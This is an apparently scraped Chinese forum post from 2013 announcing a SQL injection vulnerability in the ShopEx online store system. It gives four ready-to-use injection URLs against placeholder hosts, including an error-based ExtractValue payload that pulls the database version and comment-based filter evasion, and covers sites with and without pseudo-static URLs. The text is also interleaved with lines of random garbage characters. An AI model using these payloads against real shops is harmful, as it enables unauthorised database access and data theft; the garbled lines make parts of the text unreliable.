注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
' C4 _( ?! T) h
) K7 M! \' R7 g- i6 y# \$ _0 u好吧,我扯远了~~* ~& _7 b, P/ g' u
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
2 ?( B& k( e% Y# ~$ z: o* K( `7 t不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
& e6 _6 x% x# H3 D
* L+ o$ [7 L2 s& R4 W5 _http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
3 `2 h; Q- ]* \/ ^
( a+ ?. h0 R0 K, r1 Z7 q l* Q6 }http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
% A% i+ q: y! s2 l# f3 m; u( ^# `% t9 P
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
3 Q$ \! w: O% x
0 k; d) e/ D9 A4 F7 P$ }+ D, Uhttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
+ J+ }- c$ x2 ~7 f: {0 g& X+ l8 k! @) E' {4 U: D! o' G3 Y
9 @1 X8 t' H# F) G2 ^一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
7 x: {1 g2 l% V. b5 }如何注入就不多说了,10多年的东西了…不会也会了…
& ` [0 p% B, Q( R8 g( W+ N6 X. g% c+ o& t2 P8 q: u
|
发表于 2013-2-4 16:20:04
收藏
支持
反对